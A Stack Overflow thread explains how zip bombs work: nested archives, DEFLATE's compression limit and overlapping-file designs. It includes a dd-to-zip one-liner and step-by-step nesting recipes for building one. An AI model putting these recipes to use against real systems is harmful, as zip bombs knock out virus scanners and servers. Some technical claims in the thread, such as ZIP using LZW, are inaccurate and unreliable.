146

This question about zip bombs naturally led me to the Wikipedia page on the topic. The article mentions an example of a 45.1 kb zip file that decompresses to 1.3 exabytes.

What are the principles/techniques that would be used to create such a file in the first place? I don't want to actually do this, more interested in a simplified "how-stuff-works" explanation of the concepts involved.

The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

syntagma
  • 23,346
  • 16
  • 78
  • 134
pufferfish
  • 16,651
  • 15
  • 56
  • 65
  • So I'm not the only one that automatically opened up Wikipedia and read about this... good to know :) – Edan Maor Sep 22 '09 at 12:05
  • I'm curious. Antivirus does not check this (like that solution in python provided in 'This question')? – Arnis Lapsa Sep 22 '09 at 12:34
  • I know of at least one major production server that was taken down by a very large zip file. It wasn't an intentional zip bomb, the file extension of it was ".log" ;-P – Robert Fraser Sep 22 '09 at 12:36
  • Should we make a zip-bomb tag for this and other question? – James McMahon Sep 22 '09 at 12:45
  • Seems like a good tag instead of "math" and "computer-science", swap those with zip-bomb and zip – Chris S Sep 22 '09 at 13:02
  • 5
    @Michael your complaint isn't valid. Not only did OP ask how it works, nothing in the article posted says it is for the express purpose of disabling anti-virus. Quite the opposite, it seems the thrust of the article is a DOS-style attack with only a passing mention of anti-virus disabling. – San Jacinto Sep 22 '09 at 13:43
  • 2
    The point is that the OP was referring to a specific file, which consists of nested archives, not one huge compressed file. – Michael Borgwardt Sep 22 '09 at 15:54
  • 1
    I think Michael's right, he explains how to create the file described in the "PS", and everyone else doesn't. However, the "PS" was added as an edit, so those answers may not have been blatantly wrong at the time they were given. They just thought "such a file" meant "any file that decompresses to 1.3 exabytes", when it turns out it was intended to mean "a file structured like the one described in the article I link to". – Steve Jessop Sep 22 '09 at 16:33
  • 1
    @onebyone I agree completely. I just don't think a downvote is appropriate in such a circumstance. – San Jacinto Sep 22 '09 at 17:32
  • 4
    I guess it depends whether you consider a downvote to mean "this is not the best answer to the question", or "you are a fool and not worthy to live", or whereabouts in between. Personally, I take a downvote to mean I should re-read my answer and see if there's anything obviously wrong with it that I should fix. But then, I'm fairly happy now to be disagreed with and not change my answer, if I think my answer contributes something. And I've become fairly unconcerned about the whole voting process anyway, now that it's clear I'll never catch Jon Skeet ;-) – Steve Jessop Sep 22 '09 at 18:04
  • 1
    See also: http://www.steike.com/code/useless/zip-file-quine/ – sdcvvc Sep 25 '09 at 23:51
  • Would 1.3 exabytes cause a system to crash? – Joe R. Aug 06 '12 at 04:38
  • One does not simply make a Zip bomb... – rud3y Jan 06 '13 at 15:50

15 Answers15

101

Citing from the Wikipedia page:

One example of a Zip bomb is the file 45.1.zip which was 45.1 kilobytes of compressed data, containing nine layers of nested zip files in sets of 10, each bottom layer archive containing a 1.30 gigabyte file for a total of 1.30 exabytes of uncompressed data.

So all you need is one single 1.3GB file full of zeroes, compress that into a ZIP file, make 10 copies, pack those into a ZIP file, and repeat this process 9 times.

This way, you get a file which, when uncompressed completely, produces an absurd amount of data without requiring you to start out with that amount.

Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large", because until the last level the total amount of data is not that much, you don't "see" how large the files at the lowest level are until you have reached that level, and each individual file is not "too large" - only the huge number is problematic.

Michael Borgwardt
  • 342,105
  • 78
  • 482
  • 720
  • 4
    Can't be... once you zip the file of zeros at the bottom, the resulting zipped file is not going to be nearly as compressible for the next layer. – pufferfish Sep 22 '09 at 12:29
  • 19
    Ah, but at each level, you have ten *identical* files - which again compresses nicely. Though ZIP does not exploit cross-file redundancy, an archive containing ten individually compressed identical files probably has lots of redundancy itself for the next layer to exploit. – Michael Borgwardt Sep 22 '09 at 12:34
  • 1
    This is insanely complicated, given that there are far simpler methods. As pufferfish pointed out, an already-compressed file is going to be *less* compressable than a non-compressed file, so your final zipped file will end up being larger than it needs to be. – Thomi Sep 22 '09 at 12:34
  • 12
    The point is NOT how to generate the maximum amount of data from the smallest possible file - the point is defeating virus scanners' attempts to guard against too-large archives. – Michael Borgwardt Sep 22 '09 at 12:40
  • 2
    That's not the thrust of the article on wikipedia. It seems to push a DOS-style attack. – San Jacinto Sep 22 '09 at 14:02
  • Yeah, but for that attack to succeed, the scanner has to actually open the archives, not refuse to do so because it can apply a simple "reject archives when the sum of the decompressed file size is larger than the HD's remaining free space" rule - the nested archives make it very hard to apply such a rule without already crashing during its application. – Michael Borgwardt Sep 22 '09 at 14:29
  • 1
    What you are saying is true, but you are downvoting valid answers based off of something the OP didn't even ask. Additionally, there are PLENTY of unzip tools that don't even pass the archive THROUGH the anti-virus, and there are many ways to obtain a file where the anti-virus doesn't have knowledge of the archive's existence. Also, what you are saying is extremely product-dependent. I see no reason for you to downvote simply because it doesn't fit your exact use case. Others have answered the OP correctly, even if not as thoroughly as your response was because of your knowledge of the topic. – San Jacinto Sep 22 '09 at 15:42
  • All modern anti-virus scanners work on-access and monitor all downloads (corporate proxies do this centrally). They do not depend on the cooperation of an unzip tool. In fact, I'm not aware of any unzip tool that actively calls a virus scanner to check archives. – Michael Borgwardt Sep 22 '09 at 15:52
  • 1
    Again, this is making a lot of assumptions. How many Linux servers are out there not running any anti-virus at all? I'm tired. You win. – San Jacinto Sep 22 '09 at 17:27
  • 2
    But the files don't get extracted recursively... the victim should keep on extracting the sub zip files to make it work...Any work around for it. – Manoj Sep 22 '09 at 17:52
  • 1
    A virus scanner *has* to recursively open archives in order to scan the files in them - or reject nested archives, but then you'll end up rejecting a lot of legitimate stuff (nearly every non-trivial Java app will have JAR libraries inside its distribution/installation archive). – Michael Borgwardt Sep 22 '09 at 19:26
  • @unknown I'm not saying all computers are running such virus scanners - but a very large percentage of all Windows PCs (and probably servers as well) does, and that's how they work. – Michael Borgwardt Sep 22 '09 at 19:28
  • @Michael I'm not contesting your explanation. Please see the comments on the OP. – San Jacinto Sep 22 '09 at 20:03
  • I tried making a file of zeros (1gb) and zipping it. It produces a 500mb zip file, unless Michael meant 0000,0000 for each byte. – Chris S Sep 22 '09 at 21:58
  • Also if you look at the exploit details, you can see McAfee, Sophos and a few others plugged this hole a while ago. However it still remains from 2001. Scansafe sees it at a trojan for some reason. – Chris S Sep 22 '09 at 22:02
  • If 1GB of zeroes (binary or ASCII zeroes does not matter) produces a 500MB ZIP file, then you either messed up and did not in fact fill the file with zeroes, or your ZIP packer is really really bad. And yeah, this isn't exactly new, so I'd expect the antivirus makers to have wised up... it's not impossible to defend against such a file, just somewhat hard. – Michael Borgwardt Sep 22 '09 at 22:24
59

Create a 1.3 exabyte file of zeros.

Right click > Send to compressed (zipped) folder.

wefwfwefwe
  • 3,382
  • 1
  • 21
  • 24
47

This is easily done under Linux using the following command:

dd if=/dev/zero bs=1024 count=10000 | zip zipbomb.zip -

Replace count with the number of KB you want to compress. The example above creates a 10MiB zip bomb (not much of a bomb at all, but it shows the process).

You DO NOT need hard disk space to store all the uncompressed data.

Thomi
  • 11,647
  • 13
  • 72
  • 110
  • 9
    But you *need* the computing power to compress the uncompressed data, it's still O(n) in the size of the *uncompressed* data. – tonfa Sep 22 '09 at 15:08
  • 2
    Yes, as are all the other answers here. – Thomi Sep 22 '09 at 15:12
  • 7
    Michael Borgwardt's answer is O(log N) in the size of the uncompressed data. – Steve Jessop Sep 22 '09 at 16:23
  • 1
    Approximately, anyway. Each repeat of the process "strip off the archive headers, duplicate the compressed file entry 10 times, replace the archive headers, compress" increases the level of zip nesting by 1, takes time proportional to the size of the compressed data from the previous step, multiplies the size of the uncompressed data by 10, and if it increases the size of the compressed data at all, certainly doesn't do so by anything like a linear factor. – Steve Jessop Sep 22 '09 at 16:36
  • 4
    So just as a test, I zip -9 1.3 GB of zeros. The result is a 1.3M file. I duplicated this 10 times (couldn't be bothered messing with the zip headers, so the result won't work as a zip bomb, but illustrates the principle) to give a 13M file, which compresses with zip -9 to 34381 bytes. So the duplication step actually makes the file smaller, because deflate only supports tokens of a certain max size. Next step results in 18453, then 19012, 19312, 19743, 20120, 20531, 20870. – Steve Jessop Sep 22 '09 at 17:02
  • @tonfa I don't think compute cost can be compared here because this bomb doesn't do the same thing as in Michael Borgwardt's answer. _This_ bomb only requires the victim to double click one zip file one time. Michael Borgwardt's bomb requires the victim to _recursively_ unzip _all_ the nested zip files. Also this bomb looks like a single file, whereas the other solution creates a big file tree, so semantically the payload is much larger/more complex than the payload from this solution. – Noah Sussman Feb 20 '16 at 00:48
  • you forgot the conv=sparse for you last sentence to be true. – jrwren Oct 30 '18 at 13:41
10

Below is for Windows:

From the Security Focus proof of concept (NSFW!), it's a ZIP file with 16 folders, each with 16 folders, which goes on like so (42 is the zip file name):

\42\lib 0\book 0\chapter 0\doc 0\0.dll
...
\42\lib F\book F\chapter F\doc F\0.dll

I'm probably wrong with this figure, but it produces 4^16 (4,294,967,296) directories. Because each directory needs allocation space of N bytes, it ends up being huge. The dll file at the end is 0 bytes.

Unzipped the first directory alone \42\lib 0\book 0\chapter 0\doc 0\0.dll results in 4gb of allocation space.

Chris S
  • 64,770
  • 52
  • 221
  • 239
  • I guess some workplaces have filtering or logging of such "dubious" sites... :-) – Shalom Craimer Sep 22 '09 at 12:50
  • 28
    I just assumed their were naked ladies doing security research. – James McMahon Sep 22 '09 at 12:53
  • 3
    The zip was nsfw. A big panic red alarm will go off and a cage will fall down from the ceiling around your desk – Chris S Sep 22 '09 at 12:54
  • You'll get an angry sys admin running to your desk if you click on the link, or just blocked URL and then a meeting with HR if you work at that kind of establishment – Chris S Sep 22 '09 at 14:05
  • 4
    If every hit on a virus file results in an interview with HR, then either you don't need the virus scanner, or else you don't need your HR department. One of them isn't contributing to the business ;-) – Steve Jessop Sep 22 '09 at 16:21
  • 2
    Could also be NSFW because a Network Virus Scanner might want to check it - and extract it to do so. – Michael Stum Sep 22 '09 at 18:13
  • 5
    The virus scanner should just mark it suspicious (which may result in it being safely blocked, or may result in you unsafely being reported for trying to install viruses). If the bomb actually explodes, then your IT department has learnt something valuable - they need a better virus scanner. – Steve Jessop Sep 23 '09 at 01:06
9

Serious answer:

(Very basically) Compression relies on spotting repeating patterns, so the zip file would contain data representing something like

0x100000000000000000000000000000000000  
(Repeat this '0' ten trillion times)

Very short zip file, but huge when you expand it.

wefwfwefwe
  • 3,382
  • 1
  • 21
  • 24
  • 1
    That could be compressed even further, really: 0x1(0x35) (that is, the second 0 is repeated 35 times so it would expand to your comment) – Michael Jan 13 '11 at 04:08
6

The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

First off, the Wikipedia article currently says 5 layers with 16 files each. Not sure where the discrepancy comes from, but it's not all that relevant. The real question is why use nesting in the first place.

DEFLATE, the only commonly supported compression method for zip files*, has a maximum compression ratio of 1032. This can be achieved asymptotically for any repeating sequence of 1-3 bytes. No matter what you do to a zip file, as long as it is only using DEFLATE, the unpacked size will be at most 1032 times the size of the original zip file.

Therefore, it is necessary to use nested zip files to achieve really outrageous compression ratios. If you have 2 layers of compression, the maximum ratio becomes 1032^2 = 1065024. For 3, it's 1099104768, and so on. For the 5 layers used in 42.zip, the theoretical maximum compression ratio is 1170572956434432. As you can see, the actual 42.zip is far from that level. Part of that is the overhead of the zip format, and part of it is that they just didn't care.

If I had to guess, I'd say that 42.zip was formed by just creating a large empty file, and repeatedly zipping and copying it. There is no attempt to push the limits of the format or maximize compression or anything - they just arbitrarily picked 16 copies per layer. The point was to create a large payload without much effort.

Note: Other compression formats, such as bzip2, offer much, much, much larger maximum compression ratios. However, most zip parsers don't accept them.

P.S. It is possible to create a zip file which will unzip to a copy of itself (a quine). You can also make one that unzips to multiple copies of itself. Therefore, if you recursively unzip a file forever, the maximum possible size is infinite. The only limitation is that it can increase by at most 1032 on each iteration.

P.P.S. The 1032 figure assumes that file data in the zip are disjoint. One quirk of the zip file format is that it has a central directory which lists the files in the archive and offsets to the file data. If you create multiple file entries pointing to the same data, you can achieve much higher compression ratios even with no nesting, but such a zip file is likely to be rejected by parsers.

Antimony
  • 37,781
  • 10
  • 100
  • 107
5

To create one in a practical setting (i.e. without creating a 1.3 exabyte file on you enormous harddrive), you would probably have to learn the file format at a binary level and write something that translates to what your desired file would look like, post-compression.

Andy_Vulhop
  • 4,699
  • 3
  • 25
  • 34
4

A nice way to create a zipbomb (or gzbomb) is to know the binary format you are targeting. Otherwise, even if you use a streaming file (for example using /dev/zero) you'll still be limited by computing power needed to compress the stream.

A nice example of a gzip bomb: http://selenic.com/googolplex.gz57 (there's a message embedded in the file after several level of compression resulting in huge files)

Have fun finding that message :)

tonfa
  • 24,151
  • 2
  • 35
  • 41
3

Silicon Valley Season 3 Episode 7 brought me here. The steps to generate a zip bomb would be.

  1. Create a dummy file with zeros (or ones if you think they're skinny) of size (say 1 GB).
  2. Compress this file to a zip-file say 1.zip.
  3. Make n (say 10) copies of this file and add these 10 files to a compressed archive (say 2.zip).
  4. Repeat step 3 k number of times.
  5. You'll get a zip bomb.

For a Python implementation, check this.

Abdul Fatir
  • 6,159
  • 5
  • 31
  • 58
3

It is not necessary to use nested files, you can take advantage of the zip format to overlay data.

https://www.bamsoftware.com/hacks/zipbomb/

"This article shows how to construct a non-recursive zip bomb that achieves a high compression ratio by overlapping files inside the zip container. "Non-recursive" means that it does not rely on a decompressor's recursively unpacking zip files nested within zip files: it expands fully after a single round of decompression. The output size increases quadratically in the input size, reaching a compression ratio of over 28 million (10 MB → 281 TB) at the limits of the zip format. Even greater expansion is possible using 64-bit extensions. The construction uses only the most common compression algorithm, DEFLATE, and is compatible with most zip parsers."

"Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, expands to a formidable 4.5 PB if all six of its layers are recursively unzipped, but a trifling 0.6 MB at the top layer. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once."

2

Tried it. the output zip file size was a small 84-KB file.

Steps I made so far:

  1. create a 1.4-GB .txt file full of '0'
  2. compress it.
  3. rename the .zip to .txt then make 16 copies
  4. compresse all of it into a .zip file,
  5. rename the renamed .txt files inside the .zip file into .zip again
  6. repeat steps 3 to 5 eight times.
  7. Enjoy :)

though i dont know how to explain the part where the compression of the renamed zip file still compresses it into a smaller size, but it works. Maybe i just lack the technical terms.

jaycroll
  • 67
  • 5
  • 1
    By the way, don't be afraid that it will continuously extract all the zip files inside it. It only extracts the zip file that are nested below it, and not all the way to the bottom. – jaycroll Oct 17 '12 at 09:44
2

Perhaps, on unix, you could pipe a certain amount of zeros directly into a zip program or something? Don't know enough about unix to explain how you would do that though. Other than that you would need a source of zeros, and pipe them into a zipper that read from stdin or something...

Svish
  • 152,914
  • 173
  • 462
  • 620
  • Downvoted for disregarding the actual question, which mentions a specific file that's explicitly not the result of zipping one big stream of zeroes. – Michael Borgwardt Sep 22 '09 at 12:38
  • Nope, you'll still be limited by the computing power. Ideally you don't want to run gzip/zip since it will use a lot of CPU (or at least O(n) n being the size of the decompressed file) – tonfa Sep 22 '09 at 12:38
  • @tonfa: Well, of course you will be limited by computing power. My reasoning was that you might not want to create an exabyte large file on your disc and then zip that... – Svish Sep 22 '09 at 13:01
2

All file compression algorithms rely on the entropy of the information to be compressed. Theoretically you can compress a stream of 0's or 1's, and if it's long enough, it will compress very well.

That's the theory part. The practical part has already been pointed out by others.

Calyth
  • 1,673
  • 3
  • 16
  • 26
2

Recent (post 1995) compression algorithms like bz2, lzma (7-zip) and rar give spectacular compression of monotonous files, and a single layer of compression is sufficient to wrap oversized content to a managable size.

Another approach could be to create a sparse file of extreme size (exabytes) and then compress it with something mundane that understands sparse files (eg tar), now if the examiner streams the file the examiner will need to read past all those zeros that exist only to pad between the actual content of the file, if the examiner writes it to disk however very little space will be used (assuming a well-behaved unarchiver and a modern filesystem).

user340140
  • 628
  • 6
  • 10
1

I don't know if ZIP uses Run Length Encoding, but if it did, such a compressed file would contain a small piece of data and a very large run-length value. The run-length value would specify how many times the small piece of data is repeated. When you have a very large value, the resultant data is proportionally large.

Joe
  • 46,419
  • 33
  • 155
  • 245
  • 2
    ZIP uses the Lempel-Ziv-Welch (or a modified version of) compression which effectively tokenises the data. Long runs of 'sets' of bytes will result in good compression, hence why GIF (which also uses LZW) is good for graphics and JPEG (which uses a complex sine wave compression) is better for photos where the data is much more 'random'. – Lazarus Sep 22 '09 at 12:15